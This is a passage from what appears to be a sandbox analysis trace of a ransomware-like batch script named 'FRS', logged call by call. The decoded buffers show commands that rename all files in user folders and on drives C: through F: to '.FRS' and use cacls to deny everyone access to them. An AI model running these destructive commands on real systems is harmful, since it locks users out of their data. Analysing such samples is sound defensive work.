| out: lpWideCharStr="@echo off\r\nLES%\\FRS_Decryptor.exe\r\n") returned 11 [0133.301] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x13 [0133.301] _get_osfhandle (_FileHandle=3) returned 0x2ec [0133.301] GetFileType (hFile=0x2ec) returned 0x1 [0133.301] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x13 [0133.301] ReadFile (in: hFile=0x2ec, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0133.301] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=21, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x15 [0133.301] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=2, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="\r\ncho off\r\n") returned 2 [0133.301] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x15 [0133.301] _get_osfhandle (_FileHandle=3) returned 0x2ec [0133.301] GetFileType (hFile=0x2ec) returned 0x1 [0133.301] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x15 [0133.301] ReadFile (in: hFile=0x2ec, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0133.301] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=25, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x19 [0133.301] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=4, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr=":1\r\no off\r\n") returned 4 [0133.301] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x19 [0133.301] _get_osfhandle (_FileHandle=3) returned 0x2ec [0133.301] GetFileType (hFile=0x2ec) returned 0x1 [0133.301] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x19 [0133.301] ReadFile (in: hFile=0x2ec, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0133.301] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=98, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x62 [0133.301] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=73, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="for /f \"delims=\" %%i in ('find \"e\" \"C:\\FRS_TEMP\\temp.txt\"')do set n=%%i\r\nl_flag.png\r\n") returned 73 [0133.302] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x62 [0133.302] _get_osfhandle (_FileHandle=3) returned 0x2ec [0133.302] GetFileType (hFile=0x2ec) returned 0x1 [0133.302] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x62 [0133.302] ReadFile (in: hFile=0x2ec, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0133.302] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=130, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x82 [0133.302] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=32, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="If \\\"%e%\\\"==\\\"encrypt\\\" goto 3\r\ne\" \"C:\\FRS_TEMP\\temp.txt\"')do set n=%%i\r\n") returned 32 [0133.302] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x82 [0133.302] _get_osfhandle (_FileHandle=3) returned 0x2ec [0133.302] GetFileType (hFile=0x2ec) returned 0x1 [0133.302] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x82 [0133.302] ReadFile (in: hFile=0x2ec, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0133.302] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=135, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x87 [0133.302] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=5, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="cls\r\n%e%\\\"==\\\"encrypt\\\" goto 3\r\n") returned 5 [0133.302] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x87 [0133.302] _get_osfhandle (_FileHandle=3) returned 0x2ec [0133.302] GetFileType (hFile=0x2ec) returned 0x1 [0133.302] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x87 [0133.302] ReadFile (in: hFile=0x2ec, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0133.302] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=143, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8f [0133.302] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=8, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="goto 2\r\n\\\"==\\\"encrypt\\\" goto 3\r\n") returned 8 [0133.302] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8f [0133.302] _get_osfhandle (_FileHandle=3) returned 0x2ec [0133.302] GetFileType (hFile=0x2ec) returned 0x1 [0133.302] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8f [0133.302] ReadFile (in: hFile=0x2ec, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0133.302] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=145, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0133.302] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=2, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="\r\nto 2\r\n") returned 2 [0133.302] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0133.302] _get_osfhandle (_FileHandle=3) returned 0x2ec [0133.303] GetFileType (hFile=0x2ec) returned 0x1 [0133.303] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0133.303] ReadFile (in: hFile=0x2ec, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0133.303] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=149, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x95 [0133.303] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=4, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr=":2\r\n 2\r\n") returned 4 [0133.303] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x95 [0133.303] _get_osfhandle (_FileHandle=3) returned 0x2ec [0133.303] GetFileType (hFile=0x2ec) returned 0x1 [0133.303] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x95 [0133.303] ReadFile (in: hFile=0x2ec, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0133.303] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=196, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xc4 [0133.303] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=47, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Desktop\\*.*\" *.*.FRS\r\n\\temp.txt\"')do set n=%%i\r\n") returned 47 [0133.303] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xc4 [0133.303] _get_osfhandle (_FileHandle=3) returned 0x2ec [0133.303] GetFileType (hFile=0x2ec) returned 0x1 [0133.303] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xc4 [0133.303] ReadFile (in: hFile=0x2ec, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0133.303] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=247, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xf7 [0133.303] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=51, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Saved Games\\*.*\" *.*.FRS\r\np.txt\"')do set n=%%i\r\n") returned 51 [0133.303] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xf7 [0133.303] _get_osfhandle (_FileHandle=3) returned 0x2ec [0133.303] GetFileType (hFile=0x2ec) returned 0x1 [0133.303] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xf7 [0133.303] ReadFile (in: hFile=0x2ec, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0133.303] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=292, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x124 [0133.303] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=45, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Links\\*.*\" *.*.FRS\r\n.FRS\r\n") returned 45 [0133.303] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x124 [0133.303] _get_osfhandle (_FileHandle=3) returned 0x2ec [0133.303] GetFileType (hFile=0x2ec) returned 0x1 [0133.303] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x124 [0133.304] ReadFile (in: hFile=0x2ec, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0133.304] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=341, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x155 [0133.304] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=49, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Favorites\\*.*\" *.*.FRS\r\n\r\n") returned 49 [0133.304] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x155 [0133.304] _get_osfhandle (_FileHandle=3) returned 0x2ec [0133.304] GetFileType (hFile=0x2ec) returned 0x1 [0133.304] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x155 [0133.304] ReadFile (in: hFile=0x2ec, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0133.304] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=389, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x185 [0133.304] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=48, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Searches\\*.*\" *.*.FRS\r\n\n") returned 48 [0133.304] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x185 [0133.304] _get_osfhandle (_FileHandle=3) returned 0x2ec [0133.304] GetFileType (hFile=0x2ec) returned 0x1 [0133.304] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x185 [0133.304] ReadFile (in: hFile=0x2ec, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0133.304] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=435, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1b3 [0133.304] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=46, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Videos\\*.*\" *.*.FRS\r\n\r\n") returned 46 [0133.304] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1b3 [0133.304] _get_osfhandle (_FileHandle=3) returned 0x2ec [0133.304] GetFileType (hFile=0x2ec) returned 0x1 [0133.304] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1b3 [0133.304] ReadFile (in: hFile=0x2ec, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0133.304] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=483, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1e3 [0133.304] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=48, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Pictures\\*.*\" *.*.FRS\r\n") returned 48 [0133.304] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1e3 [0133.304] _get_osfhandle (_FileHandle=3) returned 0x2ec [0133.304] GetFileType (hFile=0x2ec) returned 0x1 [0133.304] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1e3 [0133.304] ReadFile (in: hFile=0x2ec, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0133.304] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=518, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x206 [0133.305] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=35, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\Public\\*.*\" *.*.FRS\r\n.*\" *.*.FRS\r\n") returned 35 [0133.305] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x206 [0133.305] _get_osfhandle (_FileHandle=3) returned 0x2ec [0133.305] GetFileType (hFile=0x2ec) returned 0x1 [0133.305] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x206 [0133.305] ReadFile (in: hFile=0x2ec, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0133.305] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=540, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x21c [0133.305] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\*.*\" *.*.FRS\r\n.*\" *.*.FRS\r\n") returned 22 [0133.305] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x21c [0133.305] _get_osfhandle (_FileHandle=3) returned 0x2ec [0133.305] GetFileType (hFile=0x2ec) returned 0x1 [0133.305] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x21c [0133.305] ReadFile (in: hFile=0x2ec, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0133.305] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=562, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x232 [0133.305] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"D:\\*.*\" *.*.FRS\r\n") returned 22 [0133.305] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x232 [0133.305] _get_osfhandle (_FileHandle=3) returned 0x2ec [0133.305] GetFileType (hFile=0x2ec) returned 0x1 [0133.305] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x232 [0133.305] ReadFile (in: hFile=0x2ec, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0133.305] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=584, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x248 [0133.305] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"E:\\*.*\" *.*.FRS\r\n") returned 22 [0133.305] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x248 [0133.305] _get_osfhandle (_FileHandle=3) returned 0x2ec [0133.305] GetFileType (hFile=0x2ec) returned 0x1 [0133.305] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x248 [0133.305] ReadFile (in: hFile=0x2ec, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0133.305] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=606, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x25e [0133.305] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"F:\\*.*\" *.*.FRS\r\n") returned 22 [0133.305] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x25e [0133.305] _get_osfhandle (_FileHandle=3) returned 0x2ec [0133.306] GetFileType (hFile=0x2ec) returned 0x1 [0133.306] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x25e [0133.306] ReadFile (in: hFile=0x2ec, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0133.306] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=669, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x29d [0133.306] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=63, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Desktop\\*.*\" /e /d everyone\r\net n=%%i\r\n") returned 63 [0133.306] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x29d [0133.306] _get_osfhandle (_FileHandle=3) returned 0x2ec [0133.306] GetFileType (hFile=0x2ec) returned 0x1 [0133.306] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x29d [0133.306] ReadFile (in: hFile=0x2ec, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0133.306] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=736, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2e0 [0133.306] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=67, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Saved Games\\*.*\" /e /d everyone\r\n=%%i\r\n") returned 67 [0133.306] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2e0 [0133.306] _get_osfhandle (_FileHandle=3) returned 0x2ec [0133.306] GetFileType (hFile=0x2ec) returned 0x1 [0133.306] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2e0 [0133.306] ReadFile (in: hFile=0x2ec, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0133.306] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=797, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x31d [0133.306] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=61, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Links\\*.*\" /e /d everyone\r\nyone\r\n") returned 61 [0133.306] SetFilePointer (in: 